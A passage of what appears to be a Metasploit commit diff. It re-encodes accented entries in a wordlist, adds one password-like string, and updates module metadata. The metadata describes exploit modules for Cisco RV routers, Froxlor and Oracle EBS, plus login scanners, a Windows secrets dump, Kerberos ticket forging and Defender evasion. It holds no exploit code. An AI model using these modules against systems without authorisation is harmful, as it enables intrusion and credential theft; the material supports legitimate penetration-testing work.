@@ -24869,8 +24869,8 @@ entreatingly
 entreaty
 entrechat
 entrecote
-entrecôte
-entrecôtes
+entrecôte
+entrecôtes
 entree
 entrees
 entremets
@@ -24880,8 +24880,8 @@ entrepot
 entrepreneur
 entrepreneurial
 entrepreneurship
-entrepôt
-entrepôts
+entrepôt
+entrepôts
 entries
 entropic
 entropy
@@ -24890,8 +24890,8 @@ entry
 entryphone
 entryphones
 entryway
-entrée
-entrées
+entrée
+entrées
 entshonalanga
 entshongwe
 entumbane
@@ -25442,7 +25442,7 @@ ester
 estera
 esterase
 esterhazy
-esterházy
+esterházy
 esterpark
 estes
 estevan
@@ -26239,8 +26239,8 @@ expository
 expostulate
 expostulation
 exposure
-exposé
-exposés
+exposé
+exposés
 expound
 expounder
 express
@@ -26493,7 +26493,7 @@ fab
 fabe
 faber
 faberge
-fabergé
+fabergé
 fabian
 fabiano
 fabians
@@ -27073,10 +27073,10 @@ fays
 fayth
 faythe
 faze
-façade
-façades
-faïence
-faïences
+façade
+façades
+faïence
+faïences
 fbi
 fcc
 fd
@@ -27438,10 +27438,10 @@ fi
 fia
 fiance
 fiancee
-fiancé
-fiancée
-fiancées
-fiancés
+fiancé
+fiancée
+fiancées
+fiancés
 fiann
 fianna
 fiasco
@@ -28051,10 +28051,10 @@ flambes
 flamboyance
 flamboyancy
 flamboyant
-flambé
-flambéed
-flambéing
-flambés
+flambé
+flambéed
+flambéing
+flambés
 flame
 flame-proof
 flame-proofed
@@ -29111,7 +29111,7 @@ fosterer
 fostering
 fotomat
 foucault
-fouché
+fouché
 fought
 foul
 foul-mouth
@@ -29306,14 +29306,14 @@ franticness
 frants
 franz
 franzen
-françois
-françoise
+françois
+françoise
 frap
 frappe
 frappeed
 frappeing
 frappes
-frappé
+frappé
 frasco
 fraser
 fraserburg
@@ -29993,11 +29993,11 @@ fy
 fyi
 fynbos
 fynnland
-fête
-fêtes
-föhn
-führer
-führers
+fête
+fêtes
+föhn
+führer
+führers
 g
 g-string
 g-strings
@@ -30428,8 +30428,8 @@ garwin
 garwood
 gary
 garza
-garçon
-garçons
+garçon
+garçons
 gas
 gas-permeable
 gasbag
@@ -31012,7 +31012,7 @@ gettysburg
 getup
 gewgaw
 gewurztraminer
-gewürztraminer
+gewürztraminer
 geysdorp
 geyser
 gezangave
@@ -31316,10 +31316,10 @@ glaciological
 glaciologist
 glaciology
 glacis
-glacé
-glacéed
-glacéing
-glacés
+glacé
+glacéed
+glacéing
+glacés
 glad
 gladded
 gladden
@@ -32726,11 +32726,11 @@ grus
 grusky
 gruyere
 gruyeres
-gruyère
+gruyère
 gryphon
 grysvok
-grâce
-grünewald
+grâce
+grünewald
 gs
 gsa
 gsm
@@ -33098,8 +33098,8 @@ gyromagnetic
 gyroscope
 gyroscopic
 gyve
-gödel
-göteborg
+gödel
+göteborg
 h
 h2opolo
 ha
@@ -33137,8 +33137,8 @@ habitualness
 habituate
 habituation
 habitue
-habitué
-habitués
+habitué
+habitués
 hacienda
 hack
 hackable
@@ -36618,7 +36618,7 @@ hysterical
 hystericism
 hyundai
 hz
-héloise
+héloise
 i
 i.e.
 ia
@@ -38232,8 +38232,8 @@ inguinal
 ingunna
 ingvar
 ingwavuma
-ingénue
-ingénues
+ingénue
+ingénues
 inhabit
 inhabitable
 inhabitance
@@ -39844,8 +39844,8 @@ jakey
 jakie
 jakob
 jalapeno
-jalapeño
-jalapeños
+jalapeño
+jalapeños
 jalopy
 jalousie
 jam
@@ -39963,8 +39963,8 @@ jarad
 jard
 jardine
 jardiniere
-jardinière
-jardinières
+jardinière
+jardinières
 jareb
 jared
 jarful
@@ -40579,7 +40579,7 @@ jostle
 jostling
 josue
 josy
-josé
+josé
 jot
 jotted
 jotter
@@ -41766,8 +41766,8 @@ kinder
 kindergarten
 kindergartener
 kindergartner
-kindergärtner
-kindergärtners
+kindergärtner
+kindergärtners
 kindest
 kindhearted
 kindheartedness
@@ -42434,8 +42434,8 @@ krystal
 krystalle
 krystle
 krystyna
-króna
-krónur
+króna
+krónur
 ks
 kshatriya
 kt
@@ -42926,7 +42926,7 @@ lamport
 lamppost
 lamprey
 lampshade
-lamé
+lamé
 lan
 lana
 lanae
@@ -44646,8 +44646,8 @@ littleness
 littleton
 litton
 littoral
-littérateur
-littérateurs
+littérateur
+littérateurs
 liturgic
 liturgical
 liturgics
@@ -44939,7 +44939,7 @@ lombard
 lombardi
 lombardy
 lome
-lomé
+lomé
 lon
 lona
 london
@@ -45496,7 +45496,7 @@ luminescent
 luminosity
 luminous
 luminousness
-lumière
+lumière
 lumku
 lummox
 lump
@@ -45655,7 +45655,7 @@ lychgate
 lycopodium
 lycra
 lycurgus
-lycée
+lycée
 lyda
 lydenburg
 lydia
@@ -45858,8 +45858,8 @@ macos
 macpaint
 macquarie
 macrame
-macramé
-macramés
+macramé
+macramés
 macro
 macrobiotic
 macrobiotics
@@ -46414,7 +46414,7 @@ mallala
 mallapunyah
 mallard
 mallarme
-mallarmé
+mallarmé
 malleability
 malleable
 malleableness
@@ -46696,7 +46696,7 @@ manorial
 manpower
 manque
 manquzu
-manqué
+manqué
 mans
 mansard
 manse
@@ -46758,10 +46758,10 @@ manzengwenya
 manzi
 manzibomvu
 manzimahle
-manège
-manèged
-manèges
-manèging
+manège
+manèged
+manèges
+manèging
 mao
 maoism
 maoist
@@ -47448,7 +47448,7 @@ matimatolo
 matinee
 mating
 matins
-matinée
+matinée
 matisse
 matiwane
 matjeka
@@ -47540,8 +47540,8 @@ matzoh
 matzot
 matzoth
 matzotshweni
-matériel
-matériels
+matériel
+matériels
 mau
 maubane
 maud
@@ -47688,8 +47688,8 @@ mazourka
 mazurka
 mazy
 mazzini
-maître
-mañana
+maître
+mañana
 mb
 mba
 mbabane
@@ -51549,15 +51549,15 @@ mzomusha
 mzonga
 mzonyane
 mzotho
-mélange
-mémoire
-ménage
-métier
-métiers
-mêlée
-mêlées
-möbius
-münchhausen
+mélange
+mémoire
+ménage
+métier
+métiers
+mêlée
+mêlées
+möbius
+münchhausen
 n
 na
 naaco
@@ -51632,8 +51632,8 @@ naive
 naiveness
 naivete
 naivety
-naiveté
-naivetés
+naiveté
+naivetés
 nakamura
 nakayama
 naked
@@ -51939,13 +51939,13 @@ nazca
 nazi
 naziism
 nazism
-naïve
-naïvely
-naïveness
-naïveties
-naïvety
-naïveté
-naïvetés
+naïve
+naïvely
+naïveness
+naïveties
+naïvety
+naïveté
+naïvetés
 nb
 nba
 nbc
@@ -52136,8 +52136,8 @@ negligent
 negligibility
 negligible
 negligibly
-negligée
-negligées
+negligée
+negligées
 negotiability
 negotiable
 negotiant
@@ -54074,10 +54074,10 @@ nouakchott
 nougat
 nought
 noumea
-nouméa
+nouméa
 noun
 nounal
-nounéa
+nounéa
 noupoort
 nourish
 nourished
@@ -54431,10 +54431,10 @@ nzima
 nzimakazi
 nzokhulayo
 nzombane
-nè
-né
-née
-négligé
+nè
+né
+née
+négligé
 o
 oaf
 oafish
@@ -55069,7 +55069,7 @@ olympian
 olympic
 olympie
 olympus
-olé
+olé
 om
 omagh
 omaha
@@ -55933,7 +55933,7 @@ outrigger
 outright
 outrun
 outrunning
-outré
+outré
 outscore
 outsell
 outset
@@ -57060,7 +57060,7 @@ paranoiac
 paranoid
 paranormal
 paranormally
-paraná
+paraná
 parapet
 paraphernalia
 paraphrase
@@ -57357,8 +57357,8 @@ passwd
 password
 password1
 passworded
-passé
-passée
+passé
+passée
 past
 pasta
 paste
@@ -59360,10 +59360,10 @@ pizzazz
 pizzeria
 pizzicati
 pizzicato
-piñata
-piñatas
-piñon
-piñons
+piñata
+piñatas
+piñon
+piñons
 pj
 pk
 pkg
@@ -59854,7 +59854,7 @@ poignancy
 poignant
 poikilothermic
 poincare
-poincaré
+poincaré
 poinciana
 poincianas
 poindexter
@@ -60303,8 +60303,8 @@ portie
 portiere
 porting
 portion
-portière
-portières
+portière
+portières
 portland
 portliness
 portly
@@ -61002,10 +61002,10 @@ premise
 premiss
 premium
 premix
-première
-premièred
-premières
-premièring
+première
+premièred
+premières
+premièring
 premolar
 premonition
 premonitory
@@ -61923,10 +61923,10 @@ protrusively
 protrusiveness
 protuberance
 protuberant
-protégé
-protégée
-protégées
-protégés
+protégé
+protégée
+protégées
+protégés
 proud
 proudhon
 proust
@@ -61946,7 +61946,7 @@ provence
 provender
 provenience
 provenly
-provençal
+provençal
 prover
 proverb
 proverbial
@@ -62019,10 +62019,10 @@ pryce
 pryer
 prying
 pryor
-précis
-précised
-précises
-précising
+précis
+précised
+précises
+précising
 ps
 psalm
 psalmist
@@ -62429,10 +62429,10 @@ purvey
 purveyance
 purveyor
 purview
-purée
-puréed
-puréeing
-purées
+purée
+puréed
+puréeing
+purées
 pus
 pusan
 pusey
@@ -62580,10 +62580,10 @@ pyxidia
 pyxidium
 pyxis
 pzazz
-pâté
-pères
-pétain
-pôrto
+pâté
+pères
+pétain
+pôrto
 q
 q-tips.
 q-town
@@ -63018,6 +63018,7 @@ r1
 r1s
 r4
 r4s
+r50$K28vaIFiYxaY
 ra
 raapkraal
 rab
@@ -63215,7 +63216,7 @@ ragingly
 raglan
 ragnar
 ragnarok
-ragnarök
+ragnarök
 ragout
 rags-to-riches
 ragtag
@@ -64150,7 +64151,7 @@ recharter
 recheck
 recherche
 recherches
-recherché
+recherché
 rechristen
 recidivism
 recidivist
@@ -65462,7 +65463,7 @@ repute
 reputed
 reputes
 reputing
-repêchage
+repêchage
 request
 requested
 requester
@@ -66490,7 +66491,7 @@ risorgimento
 risotto
 rispark
 risque
-risqué
+risqué
 rissole
 rita
 ritalin
@@ -67101,7 +67102,7 @@ rostropovich
 rostrum
 roswell
 rosy
-rosé
+rosé
 rot
 rot-gut
 rota
@@ -67211,8 +67212,8 @@ routinize
 rouvin
 roux
 rouxville
-roué
-roués
+roué
+roués
 rove
 rover
 roving
@@ -67604,13 +67605,13 @@ ryon
 rysmierbult
 ryukyu
 ryun
-régime
-régimes
-résumé
-résumés
-réunion
-rôle
-rôles
+régime
+régimes
+résumé
+résumés
+réunion
+rôle
+rôles
 s
 sa
 saa
@@ -68354,10 +68355,10 @@ saussure
 saute
 sauterne
 sauternes
-sauté
-sautéed
-sautéing
-sautés
+sauté
+sautéed
+sautéing
+sautés
 sauveur
 savable
 savage
@@ -68721,7 +68722,7 @@ schrod
 schrodinger
 schroeder
 schroedinger
-schrödinger
+schrödinger
 schtick
 schubert
 schuinshoogte
@@ -70196,12 +70197,12 @@ seychelles
 seyfert
 seymour
 sezela
-señor
-señora
-señoras
-señores
-señorita
-señoritas
+señor
+señora
+señoras
+señores
+señorita
+señoritas
 sf
 sforzandi
 sforzando
@@ -72452,7 +72453,7 @@ smutting
 smutty
 smyrna
 smythesdale
-smörgåsbord
+smörgåsbord
 sn
 snaaks
 snack
@@ -72823,13 +72824,13 @@ soi
 soi-disant
 soigne
 soignee
-soigné
+soigné
 soil
 soiled
 soiling
 soiree
-soirée
-soirées
+soirée
+soirées
 sojourn
 sojourner
 sojourning
@@ -73126,8 +73127,8 @@ sottish
 sou
 soubriquet
 souffle
-soufflé
-soufflés
+soufflé
+soufflés
 sough
 soughing
 soughs
@@ -73161,8 +73162,8 @@ soup
 soupcon
 souphanouvong
 soupy
-soupçon
-soupçons
+soupçon
+soupçons
 sour
 source
 sourced
@@ -76890,9 +76891,9 @@ szechuan
 szechwan
 szilard
 szymborska
-são
-séance
-séances
+são
+séance
+séances
 t
 t-bone
 t-junction
@@ -77263,7 +77264,7 @@ tannery
 tannest
 tanney
 tannhauser
-tannhäuser
+tannhäuser
 tannie
 tannin
 tanning
@@ -78405,7 +78406,7 @@ thespis
 thessalonian
 thessalonians
 thessaloniki
-thessaloníki
+thessaloníki
 thessaly
 theta
 theunissen
@@ -79406,7 +79407,7 @@ tomorrow
 tompkins
 tomsk
 tomtit
-tomé
+tomé
 ton
 tonal
 tonality
@@ -79700,7 +79701,7 @@ touchstone
 touchwood
 touchy
 touchy-feely
-touché
+touché
 tough
 tough-minded
 toughen
@@ -81328,10 +81329,10 @@ tzarist
 tzatziki
 tzeltal
 tzigane
-tête
-tête-bêche
-tête-à-tête
-tórshavn
+tête
+tête-bêche
+tête-à-tête
+tórshavn
 u
 uar
 uart
@@ -83891,7 +83892,7 @@ valvoline
 valvular
 valvules
 valyland
-valéry
+valéry
 vamoose
 vamp
 vamped
@@ -84138,8 +84139,8 @@ velvet
 velveted
 velveteen
 velvety
-velásquez
-velázquez
+velásquez
+velázquez
 venables
 venal
 venality
@@ -84508,8 +84509,8 @@ victualer
 victualler
 victualling
 vicuna
-vicuña
-vicuñas
+vicuña
+vicuñas
 vida
 vidal
 vide
@@ -84711,7 +84712,7 @@ virulence
 virulent
 virus
 vis
-vis-à-vis
+vis-à-vis
 visa
 visage
 visagiepark
@@ -84938,13 +84939,13 @@ voidness
 voids
 voila
 voile
-voilà
+voilà
 voip
 vol
 vol-au-vent
 vol.
 volapuk
-volapük
+volapük
 volar
 volatile
 volatileness
@@ -87786,7 +87787,7 @@ yankton
 yao
 yaobang
 yaounde
-yaoundé
+yaoundé
 yap
 yapped
 yapping
@@ -88383,15 +88384,15 @@ zymurgy
 zyrtec
 zyuganov
 zzz
-zürich
-Ågar
-Ångström
-éclair
-éclairs
-éclat
-élan
-émigré
-émigrés
-épée
-étude
+zürich
+Ågar
+Ångström
+éclair
+éclairs
+éclat
+élan
+émigré
+émigrés
+épée
+étude
 vagrant
@@ -722,7 +722,7 @@
      "JaGoTu",
      "Spencer McIntyre"
    ],
-    "description": "Add, lookup and delete computer accounts via MS-SAMR. By default\n          standard active directory users can add up to 10 new computers to the\n          domain. Administrative privileges however are required to delete the\n          created accounts.",
+    "description": "Add, lookup and delete computer / machine accounts via MS-SAMR. By default\n          standard active directory users can add up to 10 new computers to the\n          domain. Administrative privileges however are required to delete the\n          created accounts.",
    "references": [
      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py"
    ],
@@ -738,7 +738,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-12-02 16:29:02 +0000",
+    "mod_time": "2023-02-22 19:43:21 +0000",
    "path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
    "is_install_path": true,
    "ref_name": "admin/dcerpc/samr_computer",
@@ -5232,7 +5232,8 @@
    "type": "auxiliary",
    "author": [
      "Benjamin Delpy",
-      "Dean Welch"
+      "Dean Welch",
+      "alanfoster"
    ],
    "description": "This module forges a Kerberos ticket",
    "references": [
@@ -5248,7 +5249,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-01-24 13:28:10 +0000",
+    "mod_time": "2023-02-20 12:57:55 +0000",
    "path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/forge_ticket",
@@ -5407,7 +5408,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-12-07 23:03:57 +0000",
+    "mod_time": "2023-03-08 16:15:24 +0000",
    "path": "/modules/auxiliary/admin/kerberos/keytab.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/keytab",
@@ -5556,7 +5557,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-11-14 12:27:38 +0000",
+    "mod_time": "2023-02-24 13:50:04 +0000",
    "path": "/modules/auxiliary/admin/ldap/rbcd.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/rbcd",
@@ -20184,7 +20185,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-12-07 10:48:07 +0000",
+    "mod_time": "2023-02-24 13:50:04 +0000",
    "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -20279,7 +20280,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-01-24 11:23:28 +0000",
+    "mod_time": "2023-02-24 13:50:04 +0000",
    "path": "/modules/auxiliary/gather/ldap_query.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_query",
@@ -22379,7 +22380,7 @@
      "Alberto Solino",
      "Christophe De La Fuente"
    ],
-    "description": "Dumps SAM hashes and LSA secrets (including cached creds) from the\n          remote Windows target without executing any agent locally. First, it\n          reads as much data as possible from the registry and then save the\n          hives locally on the target (%SYSTEMROOT%\\random.tmp). Finally, it\n          downloads the temporary hive files and reads the rest of the data\n          from it. This temporary files are removed when it's done.\n\n          On domain controllers, secrets from Active Directory is extracted\n          using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need\n          to get SIDs, NTLM hashes, groups, password history, Kerberos keys and\n          other interesting data. Note that the actual `NTDS.dit` file is not\n          downloaded. Instead, the Directory Replication Service directly asks\n          Active Directory through RPC requests.\n\n          This modules takes care of starting or enabling the Remote Registry\n          service if needed. It will restore the service to its original state\n          when it's done.\n\n          This is a port of the great Impacket `secretsdump.py` code written by\n          Alberto Solino.",
+    "description": "Dumps SAM hashes and LSA secrets (including cached creds) from the\n          remote Windows target without executing any agent locally. First, it\n          reads as much data as possible from the registry and then save the\n          hives locally on the target (%SYSTEMROOT%\\Temp\\random.tmp). Finally, it\n          downloads the temporary hive files and reads the rest of the data\n          from it. This temporary files are removed when it's done.\n\n          On domain controllers, secrets from Active Directory is extracted\n          using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need\n          to get SIDs, NTLM hashes, groups, password history, Kerberos keys and\n          other interesting data. Note that the actual `NTDS.dit` file is not\n          downloaded. Instead, the Directory Replication Service directly asks\n          Active Directory through RPC requests.\n\n          This modules takes care of starting or enabling the Remote Registry\n          service if needed. It will restore the service to its original state\n          when it's done.\n\n          This is a port of the great Impacket `secretsdump.py` code written by\n          Alberto Solino.",
    "references": [
      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py"
    ],
@@ -22395,7 +22396,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-12-07 23:03:57 +0000",
+    "mod_time": "2023-03-09 14:05:12 +0000",
    "path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_secrets_dump",
@@ -23618,7 +23619,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-06-30 15:12:23 +0000",
+    "mod_time": "2023-02-21 15:47:01 +0000",
    "path": "/modules/auxiliary/scanner/dcerpc/petitpotam.rb",
    "is_install_path": true,
    "ref_name": "scanner/dcerpc/petitpotam",
@@ -35079,6 +35080,62 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/softing_sis_login": {
+    "name": "Softing Secure Integration Server Login Utility",
+    "fullname": "auxiliary/scanner/http/softing_sis_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>"
+    ],
+    "description": "This module will attempt to authenticate to a Softing Secure Integration Server.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8099,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-02-28 15:40:03 +0000",
+    "path": "/modules/auxiliary/scanner/http/softing_sis_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/softing_sis_login",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/splunk_web_login": {
    "name": "Splunk Web Interface Login Utility",
    "fullname": "auxiliary/scanner/http/splunk_web_login",
@@ -37400,6 +37457,62 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/wowza_streaming_engine_manager_login": {
+    "name": "Wowza Streaming Engine Manager Login Utility",
+    "fullname": "auxiliary/scanner/http/wowza_streaming_engine_manager_login",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module will attempt to authenticate to Wowza Streaming Engine\n          via Wowza Streaming Engine Manager web interface.",
+    "references": [
+
+    ],
+    "platform": "Linux,OSX,Windows",
+    "arch": "",
+    "rport": 8088,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-03-07 23:42:42 +0000",
+    "path": "/modules/auxiliary/scanner/http/wowza_streaming_engine_manager_login.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/wowza_streaming_engine_manager_login",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/wp_abandoned_cart_sqli": {
    "name": "Abandoned Cart for WooCommerce SQLi Scanner",
    "fullname": "auxiliary/scanner/http/wp_abandoned_cart_sqli",
@@ -48679,7 +48792,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-03-17 16:07:31 +0000",
+    "mod_time": "2023-03-13 10:05:22 +0000",
    "path": "/modules/auxiliary/scanner/ssh/ssh_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login",
@@ -54966,7 +55079,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-07-12 17:59:12 +0000",
+    "mod_time": "2023-03-02 17:46:21 +0000",
    "path": "/modules/encoders/php/base64.rb",
    "is_install_path": true,
    "ref_name": "php/base64",
@@ -56364,7 +56477,7 @@
    "targets": [
      "Microsoft Windows"
    ],
-    "mod_time": "2018-10-11 17:38:47 +0000",
+    "mod_time": "2023-03-05 14:30:47 +0000",
    "path": "/modules/evasion/windows/windows_defender_js_hta.rb",
    "is_install_path": true,
    "ref_name": "windows/windows_defender_js_hta",
@@ -60518,6 +60631,71 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/cisco_rv340_lan": {
+    "name": "Cisco RV Series Authentication Bypass and Command Injection",
+    "fullname": "exploit/linux/http/cisco_rv340_lan",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2021-11-02",
+    "type": "exploit",
+    "author": [
+      "Biem Pham",
+      "Neterum",
+      "jbaines-r7"
+    ],
+    "description": "This module exploits two vulnerabilities, a session ID directory traversal authentication\n          bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV160, RV260, RV340,\n          and RV345 Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges.\n          This access can then be used to pivot to other parts of the network. This module works on firmware\n          versions 1.0.03.24 and below.",
+    "references": [
+      "CVE-2022-20705",
+      "CVE-2022-20707",
+      "ZDI-22-410",
+      "ZDI-22-411"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, armle",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-02-13 17:49:09 +0000",
+    "path": "/modules/exploits/linux/http/cisco_rv340_lan.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/cisco_rv340_lan",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/cisco_rv_series_authbypass_and_rce": {
    "name": "Cisco Small Business RV Series Authentication Bypass and Command Injection",
    "fullname": "exploit/linux/http/cisco_rv_series_authbypass_and_rce",
@@ -63216,6 +63394,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/froxlor_log_path_rce": {
+    "name": "Froxlor Log Path RCE",
+    "fullname": "exploit/linux/http/froxlor_log_path_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-01-29",
+    "type": "exploit",
+    "author": [
+      "Askar",
+      "jheysel-r7"
+    ],
+    "description": "Froxlor v2.0.7 and below suffer from a bug that allows authenticated users to change the application logs path\n          to any directory on the OS level which the user www-data can write without restrictions from the backend which\n          leads to writing a malicious Twig template that the application will render. That will lead to achieving a\n          remote command execution under the user www-data.",
+    "references": [
+      "URL-https://shells.systems/author/askar/",
+      "CVE-2023-0315"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Linux ",
+      "Unix Command"
+    ],
+    "mod_time": "2023-02-24 13:33:10 +0000",
+    "path": "/modules/exploits/linux/http/froxlor_log_path_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/froxlor_log_path_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/geutebruck_cmdinject_cve_2021_335xx": {
    "name": "Geutebruck Multiple Remote Command Execution",
    "fullname": "exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx",
@@ -64001,10 +64241,11 @@
      "cbmixx",
      "Green-m <greenm.xxoo@gmail.com>"
    ],
-    "description": "This module uses built-in functionality to execute arbitrary commands on an unsecured Hadoop server which is not configured for strong\n          authentication, via Hadoop's standard ResourceManager REST API.",
+    "description": "This module uses Hadoop's standard ResourceManager REST API to execute arbitrary commands on an unsecured Hadoop server.\n          Hadoop administrators should enable Kerberos authentication for these endpoints by changing the 'hadoop.security.authentication' setting in 'core-site.xml' from 'simple' (the default) to 'kerberos' before exposing the node to the network.",
    "references": [
      "URL-http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf",
-      "URL-https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn"
+      "URL-https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn",
+      "URL-https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/SecureMode.html"
    ],
    "platform": "Linux",
    "arch": "x86, x64",
@@ -64027,7 +64268,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-11-16 11:31:59 +0000",
+    "mod_time": "2023-02-15 12:37:06 +0000",
    "path": "/modules/exploits/linux/http/hadoop_unauth_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/hadoop_unauth_exec",
@@ -67702,6 +67943,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/oracle_ebs_rce_cve_2022_21587": {
+    "name": "Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload",
+    "fullname": "exploit/linux/http/oracle_ebs_rce_cve_2022_21587",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-10-01",
+    "type": "exploit",
+    "author": [
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "HMs",
+      "l1k3beef"
+    ],
+    "description": "This module exploits an unauthenticated arbitrary file upload vulnerability in Oracle Web Applications\n          Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in\n          order to gain remote code execution as the oracle user.",
+    "references": [
+      "CVE-2022-21587",
+      "URL-https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis",
+      "URL-https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/",
+      "URL-https://github.com/hieuminhnv/CVE-2022-21587-POC"
+    ],
+    "platform": "Linux",
+    "arch": "java",
+    "rport": 8000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Oracle EBS on Linux (OVA Install)"
+    ],
+    "mod_time": "2023-02-21 18:02:10 +0000",
+    "path": "/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/oracle_ebs_rce_cve_2022_21587",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/pandora_fms_events_exec": {
    "name": "Pandora FMS Events Remote Command Execution",
    "fullname": "exploit/linux/http/pandora_fms_events_exec",
@@ -68583,6 +68888,71 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/pyload_js2py_exec": {
+    "name": "pyLoad js2py Python Execution",
+    "fullname": "exploit/linux/http/pyload_js2py_exec",
+    "aliases": [
